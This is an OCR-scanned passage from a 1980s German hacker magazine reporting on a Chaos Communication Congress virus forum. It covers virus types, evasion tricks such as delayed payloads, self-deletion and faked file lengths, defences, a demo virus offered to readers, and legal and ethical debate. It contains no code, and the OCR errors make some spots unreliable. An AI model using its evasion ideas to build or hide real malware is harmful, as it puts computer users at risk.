in der sie tätig werden. In der Verbreitung gilt Für sie
praktisch das gleiche wie für alle anderen Virentypen.
Beim Starten eines infizierten Programmes werden
vor Programmausführung die Verbreiiungsaufgaben,
die Manipulationsaufgabe und die Verschieberouline
des Virus in ungenutzte Bereiche des Arbeitsspei¬
chers kopiert. Dort hinterlegt, wird das Viru.s seine
Aufgaben wesentlich flexibler erfüllen.
Irn Arbeitsspeicher hinterlegte Programme (also auch
Viren) können durch einen Interrupt (Meldung des
Betriebssystems) aktiviert werden. Dadurch kommen
diese Viren wesentlich häufiger zur Ausführung als
solche, die nur beim Starten infizierter Programme
ausgeführt werden. So genügt cs schon eine Diskette
in ein derart verseuchtes System einzuiegen. Wird
diese Diskette vom Betriebssystem erkannt, startet
das Virus gleich einen Angriff und kopiert sich in ein
Programm auf dem Datenträger. Der Ausbreitungs¬
drang speicheresidenter Vtren gilt als äußerst aggres¬
siv. Alle auf dem betroffenem DV-System benutzten
Disketten können die "Seuche” verschleppen.
Mutierende Viren
Mutierende Viren ändern bei jedem Verbreiiungsvor-
gang ihre Form. Dieses kann eine Veränderung der
Manipulationsaufgabe sein (jedes Anwenderpro¬
gramm macht andere Fehler) oder auch nur ein Ver¬
tauschen der Programmteile eine.s Virus innerhalb
des Speicherplatzes. Mutierende Viren könnten sich
z.B. selbst in Baukastentechnik bei jeder Infektion
neu zusammensetzen. Dadurch wird die Suche nach
einem erkannten Virus erheblich erschwert.
Ängstliche Viren
Eine besondere Abart sind Viren, die bei einer Akti¬
vierung zwei (oder mehrere) Infiktionen in unver-
seuchten Programmen durchführen und sich an¬
schließend selbst aus dem gestarteten Programm ent¬
fernen. Wird dem Anwender bewußt, daß das eben
gestartete Programm befallen ist, ist die Seuche schon
weitergezogen.
Die MANipulationsaufgabe
Die Verbreitungsfähigkeit der Viren ermöglicht das
unkontrollierte Einschleusen von Manipulationsauf¬
gaben. Diese Aufgaben können frei nach der Lei¬
stungsfähigkeit des ausgewählten Betriebssystems
gestaltet werden.
OS Saitd Ach
Der Phantasie keine Grenze gesetzt. . .
Der Phantasie eines VirenProgrammierers sind kaum
Grenzen gesetzt. Da davon auszugehen ist, daß Viren,
die ihre Manipulationsaufgabe gleich nach dem er¬
sten Infektionsvorgang beginnen, relativ schnell auf-
fallcn, geben viele Programmierer den Viren eine
Schlafroutine mit auf die Reise. So kann das Virus
eine hohe Verbreitung finden, bevor die Manipula¬
tion in verseuchten Systemen auflriit und der Virus¬
befall erkannt wird. Um den Ursprung einer Verseu¬
chung zu verdecken, könnten z.B. die ersten tausend
infizierten Programme zusätzlich einen Regencra-
tionsaufrag erhalten. Noch vor Inkrafttreten de.s Ma-
nipulationauflrages löschen sich diese Viren aus ih¬
ren Wirtsprogrammen heraus. Eine Analyse des In-
feklionsweges (wer hat wen verseucht) ist dadurch
fast unmöglich.
Ausschlaggebend ist der Zweck
Für das Opfer ist es von wesentlicher Bedeutung fest-
zustcllen, welcher Zweck mit einem Virenangriff ver¬
folgt wird. Es kann hilfreich sein, feslzustellen, ob be¬
stimmte Daten zum Vor- oder Nachteil Dritter gezielt
verändert wurden, um den Schaden, die Folgen und
den möglichen Täterkreis cinzugrenzen. Handelt cs
sich "nur” um eine ungezielie Verseuchung, so kann
womöglich eine hinterlistige Sabotage zum Vorteil
Dritter ausgeschlossen werden.
Auf dem CCC‘86 berichteten Teilnehmer über ver¬
schiedene Manipulationsaufgaben von Viren. So gibt
es Viren, die Daten aus unzugänglichen Speicherbe¬
reichen in für den Anwender zugängliche kopieren.
Es wurde von einem Virus berichtet, der über jedes
infiziene Programm eine "LogDaiei” anlegt, in der
notiert wird, wer wann mil welchem Kennwort dieses
Programm benutzt hat. Weiter wurde von Viren be¬
richtet, die Programme und/oder Daten zerstören,
bzw. verfälschen. Sie finden vorwiegend in Freeware
und Raubkopien Verbreitung.
Der Schaden und/oder Nutzen eines Virus hängt
vom Entwickler bzw. den Verbreitern eines Virus ab.
Wohl die Hauptursache für "Rache” sind schlechte
soziale Bedingungen für Programmierer. Daneben
fördern Neid. Mißgunst und Ohnmacht die Bereit¬
schaft zum böswilligen Vireneinsatz. Die Hauplgc-
fahr sicht Rüdiger Dierstein (DFVLR) im vorsätzli¬
chem Handeln. Die Wahrscheinlichkeit durch Spiel¬
trieb ("Mal sehen was passiert”) ein System zu infi¬
zieren, stellt ebenso ein Risiko dar. Statistisch un¬
wahrscheinlich ist für Dierstein auch die unabsichtli¬
che Generierung von Computerviren auf dem eige¬
nen DV-System, zum Beispiel durch eine Ansamm¬
lung zufälligerSpeicherreste.
Auch positive Ansätze
Inwieweit ComputerViren auch zu positiven Aufga¬
ben eingesetzt werden können, hängt von der Isola¬
tion des betroffenen DV-Systems ab. Zwar lassen sich
Viren auch mit "guten” Eigenschaften versehen, wie
z.B. eine Routine, die Daten komprimiert und da¬
durch den Speicherbedarf senkt. Jedoch kann auch
ein solch "guter” Virus bei unkontrollierter Verbrei¬
tung für Ärger sorgen.
VorteilhaM ist die Verbreiiungseigenschal i nur, wenn
nachträglich in alle Programme lusäizliche Funktio¬
nen eingebaut werden sollen. Dieses könnte z.B. ein
Virus sein, der die Programme um eine Kennwortab¬
frage erweitert. Möglich ist auch ein Virus zur Mitar-
beiterkonirolle. Einmal ausgesetzt, liefert dieses Vi¬
rus fortan genaue Nuizungsdaien der Mitarbeiter.
Damit lassen sich Unregelmäßigkeiten in der An¬
wendung erkennen ("ZimmermannVirus”).
Viren als Diebstahlsschutz
Rechtlich womöglich zulässig, aber dennoch frag¬
würdig, sind Viren als Diebstahlsschutz. Sofiwarean-
bieter wären in der Lage, auf Mes.sen ihre Programme
mit Viren zu versehen, um dadurch nach einer Ent¬
wendung der Software den Verbreitungsweg von
Raubkopien zu verfolgen.
Vireneigenschaft als Architekturprin¬
zip?
Viren mit kontrollierbaren Verbreitungswegen kön¬
nen positiv genutzt werden. Inwieweit die virulente
Eigenschaft neue Architekturen in der Gestaltung
von Betriebssystemen und Programmen ermöglicht,
ist noch unbekannt.
Erkannte Verbreitungswege von
ComputerViren
Risikogruppe Personalcomputer
Derzeit sind alle Personalcomputer für einen Viren¬
befall prädestiniert. Zum einen verwenden viele An¬
wender Computer mit weit verbreiteten Betriebssy¬
stemen (z.B, MS-DOS), zum anderen tauschen viele
der Anwender ihre Programme untereinander und
leisten der “Verseuchung” dadurch Vorschub.
Verschleppte Seuche
"Häufiger Disketientausch mil w-echselnden Part¬
nern birgt ein hohes Infektionsrisiko”. Die bei Perso¬
nalcomputern am häufigsten bekanntgewordene
Verbreitungsform von Viren findet auf Disketten
statt. Congressteilnehmer bestätigten, daß Freeware
(Programme zum Tauschen) bisher häufig als Seu-
cheniräger mißbraucht wurden. Dies wirft leider ein
schlechtes Licht auf eine an sich positive Form der
Softwareverbreitung.
Vorsätzliche Sabotage
Herkömmliche Personalcomputer bieten oft keinen
Schutz gegen Fremdbenutzung. An den Stellen, wo
technische Hilfsmittel (Schlösser. Chipcard) den Zu¬
griff begrenzen, könnten sich Saboteure die men¬
schliche Unzulänglichkeit zunutze machen. Wird ein
Virus in einem Spielprogramm versteckt, reicht es, die
Diskette in die Nähe der DV-Anlage zu bringen. Ir¬
gendein Neugieriger wird das Spiel leichtsinniger¬
weise ausprobieren.
Viren können über jede zugängliche Eingabeschnitt¬
stelle in eine DV- Anlage gelangen. Dieses könnte die
Konsole eines unbeaufsichtigten Terminals sein oder
eine Fernzugriffsmöglichkeil wie die Fernwartung.
Es ist auch denkbar, ComputerViren versteckt in eine
zum Abruf angebotene Telesoftware, etwa aus dem
Bildschirmtextsystem, auf den eigenen Rechner zu
laden.
SdiciiMjIciiher
DS Saite Noin
Viren sind bei ihrer Ausbreitung nicht auf Schwach¬
stellen oder verdeckte Kanäle angewiesen. Ist ein Vi¬
rus erst einmal in ein DV-Sysiem gelangt, breitet es
sich auf den legalen Pfaden der Benutzer aus. Wird
das Virus als wichtige Utility (Hilfsprogramm) ge¬
kennzeichnet, so steigt womöglich das Bedürfnis der
Anwender dieses Programm zu testen. Auf diesem
Wege wird das Virus in alle Zugangsbereiche des je¬
weiligen Anwenders und/oder des Programmes ver¬
schleppt.
Schutz vor Viren
’Wiren sind dann gut, wenn der Entwickler des Virus
das Serum nicht entwickeln kann" so ein Teilnehrher
des CCC*86.
Isolierte Systeme
Isolierte Systeme bieten Saboteuren wenig Angriffs-
mögilchkeiten. Ein isolierter Personalcomputer
kommt jedoch selten vor. So werden beim Militär die
Wcchsclplatten (u.a. Wang 20MB) aus der Zentra¬
leinheit herausgenommen und im Tresor verschlos¬
sen. Aber auch dort besteht die Gefahr, daß dem An¬
wender ein infiziertes Programm untergeschoben
wird.
Keine "fremden” Programme
Einfach, aber unpraktikabel ist die Methode keinerlei
Fremdsoflware auf dem Rechner zu starten, ge¬
schweige denn einzusetzen. Beim Kauf or^inalversie-
gelter Programme ist eine Gefährdung im Prinzip
weitgehend ausgeschlossen. Kommerzielle Anbieter
können es sich aus haftungstechnischen Gründen
nicht leisten, Software mit virulenten Eigenschaften
zu vertreiben.
Gefahr des Verschleppens
Es ist möglich, daß ein Virus von einem infiziertem
System durch den Servicehändler verschleppt wird.
Ebenso ist unklar, inwieweit anwenderspezifische
Programmpakete nicht durch Fahrlässigkeit des
Händlers oder Herstellers verseucht sein könnten.
Vorsicht ist geboten bei Programmen, die z.B. aus
Mailboxsystemen geholt oder von "Freunden" ko¬
piert wurden. "Einem Programm - und damit letztlich
dem ganzen DV-SysIem - kann man nur genau soviel
und genau so wenig Vertrauen schenken, wie dem,
der es geschrieben hat". Zu dieser Erkenntnis kam
der DATENSCH UTZBERATER (10/85).
Vorsätzliche Manipulation
Da von den Herstellern kaum technische Zugriffsbe-
schränkungen angeboten werden und diese auch nur
selten von den Anwendern genutzt werden, stellt die
Überwachung der befugten Rechnernutzung ein bis
heute nicht gelöstes Problem dar. Neben Zugriffsmö¬
glichkeiten durch Dritte sollte der Schulz vor böswil¬
ligen Mitarbeitern nicht vergessen werden. Sicher¬
heitssensible Leiter von Rechenzentren lassen ihre
Programmierer bei Ausspruch der Kündigung nicht
mehr an die Rechner und ändern alle relevanten
Fernzugriffsmöglichkeiten.
Schwer erkennbare Verseuchung
Um ein Virus zu erkennen, muß feslgestellt werden,
ob das mutmaßliche Virus andere Programme infi¬
ziert. So einfach diese Regel ist, so schwer ist es, sie zu
befolgen. Tatsache ist, daß man Programme schrei¬
ben kann, von denen nicht feststellbar ist, ob sie sich
wie ein Virus verhalten oder nicht.
Bei geschickter Programmierung fallen Viren auch
nicht durch langsamere Lade- oder Laufzeiten der
Programme auf. Viren mit hoher Rechenzeit könnten
lokalisiert werden. Klar sollte jedoch sein, daß bei al¬
ler Sucherei ein einziges überlebendes Virus in den
Datenbeständen genügt, um die Infektion erneut zu
starten.
Vergleichsprozeduren zwischen gesicherten Pro¬
grammen und den auf aktuellen Festplatten gespei¬
cherten Programmbeständen ermöglichen das Er¬
kennen von Unterschieden wie Länge und Inhalt.
Das die "Seuche" auslösende Programm kann aber
schon vor Monaten in die gesicherten Datenbestände
übernommen worden sein. Die Verbreitung kann da¬
durch jederzeit wieder gestartet werden.
An dieser Stelle sollte erwähnt werden, daß Viren fä¬
hig sind, alle Schreibschutzattribute (Ausnahme
Hardwareschreibschutz an der Diskette), Datums¬
und Namenseinträge zu ignorieren, beziehungsweise
wieder herzusiellen. Ein infizienes Programm muß
auch nicht unbedingt seine geänderte Länge anzei-
gen: ein für den C64 entwickelter Virus täuscht die
ursprüngliche Länge im Verzeichnis geschickt vor.
Eine Hilfe für Anwender ist ein hardwaremäßiger zu-
schaUbarer Schreibschutz für Festplatten. Damit
könnte geprüft werden, ob Programme, die nur eine
Leseberechtigung haben, unberechtigterweise auf die
Festplatte schreiben wollen. Dies ist eine Möglich¬
keit, bei der Installation neuer Software das Verhal¬
ten der Programme zu überprüfen. Gegen Viren, die
sich erst mit Verzögerung verbreiten, hilft diese
arbeitsintensive Methode jedoch nur bedingt.
Hilfe durch "Kontrolldatei”
Eine begrenzte Möglichkeit sahen Congressteilneh-
mer darin, über ihre Dalenbestände eine Prüfsumme
anzulegen. Bei einem Virenbefall würden dann die
infizierten Programme erkannt werden. Jedoch muß
bei dieser Methode eine vollständige Isolation der
Prüfprogramme gewährleistet sein. Ein Virus könnte
sonst Prüfsumme oder Prüfprogramm gezielt angrei¬
fen.
In diesem Zusammenhang erhielten wir von Ralf
Burger Hinweise über ein "Schutzprogramm" (MS-
DOS), welches unter anderem auf der Basis von Kon-
trolldateien arbeitet. Sobald dieses Programm seine
Funktionssicherheit unter Beweis gestellt hat, werden
wir darüberberichten.
Was tun Wenn?
Ohne einen umfassenden vorbeugenden Schutz vor
ComputerViren ist cs bei einem Virenbefail um die
entsprechende Datenverarbeitungsanlage schlecht
bestellt. In jedem Fall sollte keine Software mehr
verbreitet werden. Ebenso müssen alle Tauschpartner
umgehend informien werden. Weiterhin sollten alle
Datenbestände von den Programmen getrennt gesi¬
chert werden. Die "verseuchten" Programmbestände
müssen isoliert werden und dürfen Jteinesfalls mehr
mit dem System genutzt werden.
^(ticnd(f|(cuhcc
Unter Umständen läßt sich aus den "verseuchten"
Programmbeständen das Virus und deren Manipula¬
tionsaufgabe isolieren. Gelingt dies, so besteht Hoff¬
nung, den ordnungsgemäßen Stand der manipulier¬
ten Daten wiederherzustellen. Andernfalls sind die
vermutlich manipulierten Datenbestände Grundlage
für den weiteren Betrieb der DV-Anlage.
Zur Verarbeitung der Daten wird eine vollständig
neue Programmoberfläche benötigt. Deshalb sollten
alle Programme erneut von den Herstellern angefor¬
dert werden.
Anzumerken sei an dieser Stelle, daß der Geschädigte
den Schaden eines Virenbcfalls selber tragen muß,
wenn erden "Saboteur" nicht überführen kann. Dies
ist auch Voraussetzung für die Inanspruchnahme
üblicher "Mißbrauchs-Versicherungen". Ein lücken¬
loser Schuldnachweis ist jedoch bei ComputerViren
kaum möglich.
Mehr Forschung und Information
KES(4/85) ruft zur Intensivierung der Forschung auf
diesem Gebiet auf. Forschungsergebnisse sollen zu¬
künftige Entwicklungen von Abwehrmaßnahmen
ermöglichen. Ziel ist es: Die Risikoschwelle (schnel¬
lere Entdeckung) für den Eindringling zu erhöhen.
Weiterhin wurde dort die Erstellung eines Sofort-
Maßnahmen-Katalogs gefordert. Das spiegelte sich
auch in den Beiträgen der Congressteilnehmer
wieder. Konsens des Congresses ist, daß nur durch
Aufklärung und Information ein Bewußtsein für die¬
se Entwicklung gefördert werden kann und muß. Der
CCC wird dieses Thema auf einem II. PC-VirenFo-
rum im April weiterbchandeln.
Teil 3
Das Demoprogramm
VIRDEM.COM (MS-DOS)
Auf dem CCC’86 wurde im Rahmen des VirenFo*
rums ein DemoVirus vorgestellt. V1RDEM.COM
wurde von Ralf Burger entwickelt, um die Möglich¬
keit eines gefahrlosen Arbeitens mit Viren zu bieten.
Das Demoprogramm mit Hinweistexten ist von der
Redaktion zu beziehen (MS- DOS 360KB Disk oder
über Btx als Telesoftware). Das Programm verdeut¬
licht, wie hilflos ein Anwender gegenüber Computer¬
viren ist, wenn er nicht entsprechende Sicherheits¬
vorkehrungen trifft.
Das Programm VIRDEM.COM ist ein relativ harm¬
loses Virus, das Programme nicht zerstört und nur auf
Diskettenlaufwerk A zugreift. Das Virus erweitert
seine Wirtsprogramme um eine zusätzliche Funktion.
Außerdem mutiert das Virus seine Funktion bis zur 9.
Generation.
®ntciiädj(citÄcr
Die Funktion des Virus ist ein Ratespiel. Beim Start
eines infizierten Programmes meldet sich das Virus
"VIRDEM Ver.: l .0 (Generation ?) aktiv" und fragt
eine Zahl ab. Je nach Virengeneration liegt diese Zahl
zwischen null und neun. Bei einer Fehleingabe wird
das Wirtsprogramm nicht ausgeführt.
VIRDEM,COM wurde entwickelt, um allen MS-
DOS Anwendern die Möglichkeit zu bieten, sich mit
Computerviren zu beschäftigen, ohne den Gefahren
eines unkontrollierten Virenbefalls ausgesetztzu sein.
Sofern die Handhabungshinweise beachtet werden,
besteht keine Gefahr einer unbeabsichtigten Verbrei-
tung.
Die Redaktion geht davon aus, daß nur mit sehr ho¬
hem Aufwand weitere bösartige Manipulationen in
den DemoVirus eingebaut werden können. Achten
Sie trotzdem darauf, aus wessen Händen Sie das De¬
moVirus erhalten. Die Redaktion versendet auf
Wunsch die Orginalvirendiskette versiegelt.
Teil 4
Juristische Hinweise
zum Umgang mit GompuferViren
Die Thematik juristischer Konse¬
quenzen beim Umgang mit Compu¬
terViren wurde im Rahmen des Vi-
renForums nicht detailliert behandelt.
Die Diskussion auf der CLINCH-
Mailbox zeigt allerdings eine uner¬
wartete Resonanz zu diesem Thema.
Im folgenden einige Auszüge.
Experimente mit ComputerViren
Experimente mit Computerviren bedürfen einer ge¬
wissen Sorgfaltspflicht. Gewissenhafte Programmie¬
rersollten sich nicht dem Vorwurf unlauterer Absich¬
ten fahrlässig aussetzen.
"Man sollte auf jeden Fall darauf achten, daß man
keine Programme weitergibt, die ohne weiteres Zutun
Dritter die wesentlichen Eigenschaften eines Virus
entwickeln. Desweiieren sollte man Virus- Program¬
me sicher aufbewahren, damit man dem Vorwurf ent¬
geht, man habe einen späteren Täter damit zur An¬
wendung anleiten wollen. Ferner ist dafür Sorge zu
tragen, daß es demjenigen, der aus einem weitergebe¬
nen SOURCE-CODE schließlich das VirusPro-
gramm generiert, nicht erspart bleibt, einen ausführ¬
lichen Hinweis auf die Gefährlichkeit des Program¬
mes, sowie die Tatsache, daß der Autor ein Inver¬
kehrbringen desselben ablehnt, zur Kenntnis zu
nehmen."
DS Saite Zeen
DS Saite Elph
Haftungsrechtliche Fragen
Eine der wichtigsten Fragen im Umgang mit Viren
sind haftungsrechtliche Konsequenzen. Wir möchten
hier nur einige Beispiele für denkbare Ansprüche der
Opfer von Viren nennen und auf beweisiechnische
Probleme nicht weiter eingehen.
"Für Fehler (Bugs) in kommerziell verbreiteter Soft¬
ware haftet der Hersteller. Dieser Grundsatz deckt
teilweise auch diejenigen Schäden ab, die durch die
Anwendung grob fehlerhafter Programme entstehen.
Selbstverständlich sind nur die Programmversionen
von dieser Maxime gedeckt, die der Hersteller offi-
ziell ausgellefe.rt hat. Demnach haftet der Hersteller
schon dann nicht mehr in vollem Umfang, wenn der
Anwendersich die Programme auf illegale Weise ver-
schaft hat (Industriespionage, Softwarepiraterie)
oder eine Version des Programms benutzt, die sich in
der Struktur wesentlich vom ausgelieferten Orginal
unterscheidet. Fazit: Keine Haftung des Herstellers
bei Schäden durch 'verseuchte' Programme.
Der für die Verbreitung eines Virus Verantwortliche
muß nicht nur für die Kosten aufkommen, die (wenn
überhaupt möglich) die Wiederherstellung der Soft¬
ware erfordert, sondern auch für die durch die übri¬
gen Aktivitäten des Virus entstandenen Schäden.
Diese können die Schäden in der Software weil über¬
steigen, ja möglicherweise einen Umfang annehmen,
den keine Privatperson mehr abdecken kann."
Strafrechtliche Aspekte
Das größte Problem für den Entwickler von Viren ist
die strafrechtliche Relevanz seines Handelns. Das
Entwickeln und anschließende Verbreiten eines Pro¬
grammes ist solange nicht strafbar, wie sich keine
Straftatbestände finden lassen. Da der Entwickler
beim Virus am Schadenseintritt wiederholt mittelbar
beteiligt ist, kommt hier Anstiftung oder Beihilfe zu
den einschlägigen Straftaten in Betracht (allerdings
bekanntlich mit derselben Strafdrohung, wie die
Haupttat). Hier einige Leitsätze, die eine Hilfestel¬
lung geben können.
"Das Verhallen desjenigen, der einen Virus verbreitet
(oder verbreiten läßt) ist dann strafbar, wenn er den
Eintritt eines Schadens verursachen will. Eine Straf¬
barkeit ist auch dann anzunehmen, wenn der Scha-
denseinlrilt für wahrscheinlich gehalten und nichts
zu dessen Abwendung unternommen wird. Proble¬
matischer ist der Fall, wenn ein Dritter, der die Virus-
Routine erstmals vom Entwickler erhalten hat, sich
entsprechend der ersten beiden Leitsätze strafbar
macht. Hier könnte der Entwickler dann mit zur Ver¬
antwortung gezogen werden, wenn dieser mit der
Reaktion des Dritten rechnen konnte.
Die Folgen des Einsatzes von CompuierViren sind
unabsehbar und im Falle erfolgreicher Ermittlungen
vom Verursacherzu tragen. Inwieweit der Entwickler
zum Kreis der Verursacher zu rechnen ist, hängt vom
Einzelfall ab; aufgrund seiner Kenntnisse obliegt ihm
abersicherlich eine besondere Sorgfaltspflicht."
Soweit einige Hinweise für experimentierfreudige
Programmierer. Wer Viren vorsätzlich auf fremden
Computern ohne Zustimmung des Eigentümers ver¬
breitet, verstößt gegen eine Reihe von Gesetzen. Die
strafrechtlichen Hinweise erscheinen uns unter Be¬
rücksichtigung der drohenden haftungsrechtlichen
Ansprüche fast schon als sekundär.
Veröffentlichung von Computerviren
Mailboxbetreiber, die Viren in ihren Systemen zum
Abruf anbielen, sollten die Diskussion im Brett
"Rcchtswesen” der CLINCH-Mailbox beachten.
Dort werden weitere Hinweise auf die Problematik
der Veröffentlichung von Viren gegeben.
"Eine Strafbarkeit (und zivilrechtliche Haftung) we¬
gen der Veröffentlichung von Virusprogrammen
unter dem Gesichtspunkt der Anstiftung zur Daten¬
veränderung (etc.) sollte ausgeschlossen sein, wenn
kein - auch versteckter - Vorschlag gemacht wird, die¬
ses Programm ohne Einwilligung auffremdeCompu-
ter zu portieren. Zusätzlich würde ich sicherheitshal¬
ber empfehlen, ein Virusprogramm nur zusammen
mit einer erkennbar ernstgemeinten Warnung vor den
tatsächlichen und rechtlichen Folgen einer Portie¬
rung des lauffähigen Programmes zu veröffentlichen.
Bei Beachtung dieser Empfehlung halte ich die Ver¬
öffentlichung von Virusprogrammen insoweit für
(rechtlich) unbedenklich."
Wer mit Viren experimentiert, sollte sich der rechtli¬
chen Konsequenzen bewußt sein. Nicht nur der hö¬
fliche, sondern auch der vorsichtige Mensch behält
seine Viren daher vielleicht besser bei sich.
Teils
Ansichten und Einsichten
der Diskussion im PC-Virenforum
"Ich verfluche den Tag, an dem ich mir eine Festplat¬
te zugelegt habef". Erste Reaktionen auf das Wissen
um ComputerViren. Während im ersten Block des Vi-
renforums hauptsächlich sachliche Informationen
über ComputerViren vermittelt und von den Teil¬
nehmern ergänzt wurden, war für den zweiten Teil
eine Diskussion über die Folgen und den Umgang
mit ComputerViren geplant.
Als die Bayrische Hackerpost im Frühjahr 1985 erst¬
mals über Computerviren berichtete, stand die Com-
pulerWoche Kopf und verglich Hacker mit der RAF.
Eine Panikreaktion. Derartige Informationen aus
solch einer Ecke sind wohl eher geeignet, kriminelle
Potentiale zu entwickeln, war die Schluß’Tolgerung"
der CompmerWoche. Das Unverständnis, dieses
Thema zu bewältigen, führte zum Aufbau eines
Feindbildes. Solchen Auswüchsen wollte sich der
CCC in seiner Informationspolitik nicht ausseizen.
Deshalb setzte schon Mitte ’86 eine Diskussion über
ethische Fragen beim Umgang mit ComputerViren
ein. Ziel unserer Informationspolitik sollte nicht ’T-
anikmache” oder das Hcraufbeschwören einer Ge¬
fahr sein, sondern eine öffentliche Diskussion zur
Vermittlung eines gesteigerten Unrechts- und Pro¬
blembewußtseins. Der Chaos Communication Con-
gress wurde als Forum bestimmt. Der Congress bietet
eine Atmosphäre des Miteinanders, etwas, das auf
kommerziellen Veranstaltungen unmöglich ist: offe¬
ne Diskussion ohne Vorbehalte.
OS Saite Zwölph
Im wesentlichen stellte sich die Frage: wie weil geht
die Informationspolilik? Setzen wir uns bei der Ver¬
öffentlichung eines SOURCE-CODES dem Vorwurf
aus, ßauanleitungen für logische Bomben zu verbrei¬
ten? In wieweit regen wir Nachahmungstäler an?
Stellt schon eine detaillierte Veröffentlichung dieses
Wissens eine Gefahr dar? Hier ergaben sich die
unterschiedlichsten Betrachtungen.
Fesizusiellen war. daß Programmierer von Conipu-
terViren mit ihrem Wissen bisher sehr verantwor¬
tungsvoll umgehen. Viele von ihnen fragen sich, was
sie überhaupt damit machen sollen. Die Skrupel vor
dem Vireneinsatz sind unterschiedlicher Natur. Ein
Programmierer meinte: "Ich habe soviel Arbeit inve¬
stiert, jetzt will ich auch sehen, was passiert" (auch
die Atombombe mußte ausprobiert w'erden). Über¬
wiegend sprachen die Congress-Teilnehmer sich
gegen die bloße Veröffentlichung von Programm-
quellcodc aus. Und wenn, dann nur mit eindeutigen
Informationen über die Folgen und den Umgang mit
ComputerViren. Einzelnen erschien schon die Be¬
schreibung "überschreibender" und "nichlübcr-
schreibender" Viren als zu detailliert. Fast durchgän¬
gig forderten die Teilnehmer eine offene Informa¬
tionspolitik. Die freie Forschung im Sinne des "Free
Flow Of Information Act" soll helfen, positive An¬
sätze zu entwickeln.
"Veranstaltungen wie der CCC'86 erzeugen keine
entscheidende Veränderung beim Umgang mit Com¬
putern. Sie vermitteln eher ein Bewußtsein von der
Tragweite des Handelns" formuliene ein Teilnehmer.
Bisher wird, was ComputerViren betrifft, der Kreis
der "Informierten" noch als sehr klein eingeschätzt.
Daß detaillierte Informationen über ComputerViren
Nachahmungstäler anlocken, muß in Kauf genom¬
men werden, wenn der schleichenden Entwicklung
enigegengearbeitet werden soll. Die Geschichte hat
gezeigt, wie gefährlich es ist, Sicherheitsfragen von
der offenen Diskussion unter Fachleuten auszuneh¬
men. Die Affäre um Sicherheit oder Unsicherheit des
Geheimcodes der deutschen Führung im zweiten
Welktkrieg ist als abschreckendes Beispiel oft genug
erwähnt worden. Vielmehr erwarten Congressteil-
nehmerdie Einleitung einer öffentlichen Diskussion
über die "Restrisiken” neuer Technologien. Gerade
die Popularität des CCC, der seit jeher technikkriti¬
sche Themen erörtert, soll helfen, dieses Thema einer
offenen Diskussion zuzuführen.
Erstaunlich waren Thesen über "WiderstandsViren".
So sahen einige Congresslellnehmer in ComputerVi¬
ren ein legitimes Mittel zum Volkswiderstand gegen
unmenschliche, zentralisierte Grossrechenzentren.
Auch deuten einige Hinweise aus der Scene auf einen
Virusangriff gegen die Volkszählung hin. Parallelen
zum Science Fiction-Roman "Der Schockwellenrei¬
ter”, in dem John Brunner (Heyne SF 3667) schon
1975 das Bild einer computerabhängigen Welt zeich¬
nete, die durch ein "Wurmprogramm” befreit wird,
sind erkennbar.
Frankreich entschied sich im Gegensatz zur BRD
bewußt gegen die Einführung eines maschinenlesba¬
ren Ausweises. Der Grund: Demokratische Systeme
benötigen einen Spielraum, der Widerstand gegen
diktatorisches Takeover ermöglicht. So wurde die
Forderung laut, dieses technisch spezialisierte "Her¬
rschaftswissen" auch als "WiderstandsWissen" zu
fördern. Dem entgegen stand der überwiegende Teil
der Besucher mit der Auffassung, daß Hacker sich
nichl außerhalb der Gesetze steifen wollen, sondern
eher einen Spielraum ausnutzen, um auf Gefahren
aufmerksam zu machen.
SfKcilSdjfciibci*
Weitgehend unberücksichtigt blieb in den Diskussio-
tien das Potential krimineller Kräfte, die sich Vorteile
durch den Einsatz von Viren verschaffen könnten.
Weiterhin dürfen politische Gegner, sowie Geheim¬
dienste und terroristische Gruppen bei der Gefahre-
nabschäizung nichl vergessen werden. Wo ökonomi¬
sche oder ideologische Beweggründe vorliegen, ist
die Gefahr einer VirusAttacke weitaus wahrscheinli¬
cher als aus den Reihen der privaten Compulcran-
wender. Diese handeln viel eher verantworlungsbe-
W'Ußt.
So wurden Forderungen laut, daß ComputerSysteme.
die personenbezogene Daten verarbeiten oder hoch-
kritische Steuerfunktionen (zB. in Atomkraftwerken)
übernehmen, absolut virensicher sein müssen. An¬
dernfalls darf man derartige Aufgaben nicht solchen
anfälligen Technologien überantworten. Weiterhin
muß eine ethische Barriere gegen den Compuiermiß-
brauch, aber auch gegen den fahrlässigen Computer-
gebraiich aufgebaut werden. Folgend sollen For¬
schungsergebnisse die Entwicklung von Abwehrme¬
chanismen ermöglichen. Die Erhöhung der "Risiko¬
schwelle" (schnellere Entdeckung) ist jedoch nur eine
technische Hilfe, die weiterhin ein "Restrisiko” auf-
wei.st.
"Das Problem sind nicht die ComputerViren, son¬
dern die Katastrophen, die durch die Abhängigkeit
von Technologien entstehen", so die Schlußfolge¬
rung eines Congress-Teilnehmers. Nach Jahren be¬
denkenloser Technologiegläubigkeit forderten die er¬
sten technischen Mega-Katastrophen (Bhopal,
Tschernobyl, Basel) ihre Opfer. Der CCC fordert seil
langem eine süzialverträgliche Gestaltung von Tech¬
nologien. Die unverträgliche Verbraucherhaftung bei
Mißbrauch von Bildschirmtext oder Euroscheckkar¬
ten waren einige kritische Ansätze aus der letzten
Zeit. Die ComputerViren stellen nun eine neue, äu¬
ßerst brisante Erscheinung im Kräftespiel moderner
Techniken dar. Wissenschaftler erörfern seil einiger
Zeit "The Uliimaie Error Message", den Weltkrieg
durch einen Computerfehler.
Die Aufarbeitung des CCCongress'86 anhand einer
Videodokumentaiion zeigt bisher unerörterte Berei¬
che auf. Die Redaktion geht davon aus, daß in den
nächsten Monaten weiteres Material über Compu¬
ierViren veröffentlicht wird,
Der CCC veranstaltet daher am 18. und 19.April '87
ein weiteres VirenForum. Ein Anmeldeformular er¬
scheint in der DATENSCHLEUDBR 19. (Zum April
wird auch die Videodokumentation über den CCC'86
ferliggeslellt sein.)
DS Saite Dralzean
w S '7/i the Defense Department. They're caUing around the
^ I neighborhood to see tf anyone can help themßgure out why
i J every one oftheir missiles keeps overriäing their commands and
5 •» aimmg themselves ai bfrs. O'ReUly’s house down the block. ’’
^ Für eine H^ndvoll. Daten
De-Anonymisierung des gezählten Volkes
Es begab sich aber zu der Zeit, daß ein Gebot ausging
von dem Kaiser Augustus, daß alle Welt sich schätzen
ließe (Chaos-Textbaustein 42).
So wurde zu biblischen Zeiten die Tatsache doku¬
mentiert, daß jede Regierungsform Informationen
überdie Regierten benötigt, also Daten, anhand derer
man Entscheidungen für die Zukunft treffen kann.
Dieses legitime Bedürfnis findet sich heutzutage we¬
sentlich prosaischer formuliert im Volkszählungsge¬
setz wieder. Indula (Textbaustein aus dem CDU-
